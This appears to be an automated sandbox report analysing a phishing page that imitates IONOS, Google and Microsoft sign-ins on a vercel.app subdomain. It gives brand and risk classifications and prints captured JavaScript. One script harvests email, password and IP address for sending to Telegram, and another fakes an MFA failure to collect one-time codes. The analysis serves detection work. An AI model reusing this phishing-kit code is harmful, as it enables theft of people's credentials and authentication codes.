| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | ```json{ "legit_domain": "ionos.com", "classification": "known", "reasons": [ "The brand 'IONOS' is a known web hosting and cloud service provider.", "The URL 'office365-mauve.vercel.app' does not match the legitimate domain 'ionos.com'.", "The URL uses 'vercel.app', which is a platform for deploying web applications, not directly associated with IONOS.", "The subdomain 'office365-mauve' is suspicious as it combines 'office365', a Microsoft product, with a color, which is unusual and not directly related to IONOS.", "The presence of 'office365' in the subdomain could be an attempt to mislead users into thinking the site is related to Microsoft Office 365, increasing the phishing risk." ], "riskscore": 8}
Google indexed: False |
URL: office365-mauve.vercel.app
Brands: IONOS
Input Fields: recipient@email.com |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": "recipient@email.com",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"recipient@email.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"brands": [
"IONOS"
]
} |
|
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"brands": [
"IONOS"
]
} |
|
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"testGMAIL.COM"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"brands": [
"IONOS"
]
} |
|
| URL: https://office365-mauve.vercel.app/next.html... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "This script appears to have some moderate-risk indicators, such as external data transmission and aggressive DOM manipulation. However, it does not exhibit any high-risk behaviors like dynamic code execution or data exfiltration. The script seems to be focused on handling user input and updating the UI based on dropdown selection, which is a common and legitimate use case. While the script could be improved to be more transparent and less aggressive in its DOM manipulation, it does not appear to be malicious or pose a significant security risk."
} |
document.addEventListener("DOMContentLoaded", function () {
const dropdown = document.getElementById("dropdown");
const verifyButton = document.getElementById("verifyButton");
const appCodeInput = document.getElementById("appCodeInput");
const errorMessage = document.getElementById("errorMessage");
const errorMessagePassword = document.getElementById("errorMessagePassword");
const errorMessageIncomplete = document.getElementById("errorMessageIncomplete");
if (!dropdown) {
console.error("Dropdown element not found.");
}
if (!verifyButton) {
console.error("Verify Button element not found.");
}
if (!appCodeInput) {
console.error("AppCode Input element not found.");
}
if (!errorMessage) {
console.error("Error Message element not found.");
}
if (!errorMessagePassword) {
console.error("Error Message Password element not found.");
}
if (!errorMessageIncomplete) {
console.error("Error Message Incomplete element not found.");
}
function updateButtonState() {
const selectedOption = dropdown.value;
appCodeInput.style.display = (selectedOption === "option2" || selectedOption === "option3" || selectedOption === "option4") ? 'block' : 'none';
verifyButton.style.display = (selectedOption === "option2" || selectedOption === "option3" || selectedOption === "option4") ? 'block' : 'none';
errorMessage.style.display = (selectedOption === "option1") ? 'block' : 'none';
errorMessagePassword.style.display = 'none';
errorMessageIncomplete.style.display = 'none';
// Enable the button if the selected option is relevant
verifyButton.disabled = !(selectedOption === "option2" || selectedOption === "option3" || selectedOption === "option4");
}
function validateInput(event) {
const input = event.target.value;
event.target.value = input.replace(/\D/g, ''); // Remove non-numeric characters
}
dropdown.addEventListener("change", function () {
updateButtonState();
// Show the error message immediately for Option 1
if (dropdown.value === "option1") {
errorMessage.textContent = "Microsoft Authenticator app failed, please select other options call/text/appcode";
}
});
verifyButton.addEventListener("click", async function () {
const enteredCode = appCodeInput.value;
// Check if the input is not empty
if (enteredCode.trim() === "") {
errorMessagePassword.textContent = "Please enter the code before verifying.";
errorMessagePassword.style.display = 'block'; // Display the error message
errorMessageIncomplete.style.display = 'none'; // Clear the incomplete password error message
return;
}
// Check if the entered code is exactly 6 characters
if (enteredCode.length !== 6) {
errorMessageIncomplete.style.display = 'block'; // Display the incomplete password error message
errorMessagePassword.textContent = ''; // Clear the password error message
return;
}
const getIPAddress = async () => {
try {
const response = await fetch('https://api.ipify.org?format=json');
const data = await response.json();
return data.ip |
| URL: https://office365-mauve.vercel.app/js/next.js... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration and potential malicious intent. It collects user credentials (email and password) and sends them to an external server, likely a Telegram bot. Additionally, it retrieves the user's IP address, which could be used for further malicious purposes. While the script may have some legitimate functionality, the lack of transparency and the suspicious data transmission make it a high-risk script."
} |
document.addEventListener('DOMContentLoaded', function () {
console.log('DOM Content Loaded - Initializing Login Script');
const usernameInput = document.getElementById('username');
const passwordInput = document.getElementById('password');
const nextButton = document.getElementById('nextButton');
const errorMessage = document.getElementById('errorMessage');
const errorMessagePassword = document.getElementById('errorMessagePassword');
const loginForm = document.getElementById('loginForm');
// Check for missing elements
if (!usernameInput || !passwordInput || !nextButton || !errorMessage || !errorMessagePassword) {
console.error('Initialization Error: One or more form elements were not found in the DOM.');
return;
}
// Initially hide password input using a class instead of directly manipulating display
passwordInput.classList.add('hidden'); // Add hidden class to hide password input initially
nextButton.addEventListener('click', async function () {
console.log('Next Button Clicked - Starting Validation');
const trimmedUsername = usernameInput.value.trim();
const trimmedPassword = passwordInput.value.trim();
if (passwordInput.classList.contains('hidden')) { // Check if password field is hidden using class
console.log('Username step - Checking if username is provided');
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = '';
console.warn('Validation Failed: Username is empty');
return;
}
errorMessage.textContent = ''; // Clear the username error
passwordInput.classList.remove('hidden'); // Show password input by removing the 'hidden' class
nextButton.textContent = 'Sign In'; // Change button text to 'Sign In'
console.log('Username Validated - Password field displayed');
} else {
console.log('Password step - Checking if both username and password are provided');
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = '';
console.warn('Validation Failed: Username is empty on second step');
return;
}
if (!trimmedPassword) {
errorMessagePassword.textContent = 'Please fill in the password';
errorMessage.textContent = '';
console.warn('Validation Failed: Password is empty');
return;
}
errorMessage.textContent = '';
errorMessagePassword.textContent = '';
console.log('Username and Password Validated - Proceeding with IP retrieval and data submission');
try {
console.log('Fetching IP address');
const ip = await getIPAddress();
const data = {
email: trimmedUsername, // Assuming the username is an email
password: trimmedPassword,
ip,
};
console.log('IP Address Retrieved:', ip);
console.log('Sending data to Telegram:', data);
await sendRequest(data);
console.log('Data submission completed successfully');
} catch (error) {
console.error('Error during login attempt:', error);
}
loginForm.reset();
passwordInput.classList.add('hidden'); // Hide password input again
nextButton.textContent = 'Next'; // Reset button text back to 'Next'
console.log('Form reset and password field hidden');
}
});
const images = ['images/image1.jpg', 'images/image2.jpg', 'images |
| URL: https://office365-mauve.vercel.app/next.html Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/next.html Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://office365-mauve.vercel.app/next.html Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/next.html Model: Joe Sandbox AI | {
"brands": [
"Google"
]
} |
|
| URL: https://office365-mauve.vercel.app/next.html Model: Joe Sandbox AI | ```json{ "legit_domain": "google.com", "classification": "wellknown", "reasons": [ "The brand 'Google' is well-known and typically associated with the domain 'google.com'.", "The URL 'office365-mauve.vercel.app' does not match the legitimate domain for Google.", "The URL contains 'office365', which is associated with Microsoft, not Google, indicating a potential mismatch.", "The use of a third-party hosting service (vercel.app) with a brand name in the subdomain is a common tactic in phishing attempts.", "The presence of a color name 'mauve' in the subdomain is unusual and could be an attempt to obfuscate the true nature of the site." ], "riskscore": 9}
Google indexed: False |
URL: office365-mauve.vercel.app
Brands: Google
Input Fields: unknown |
Edit tour
chrome.exe (PID: 4176 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node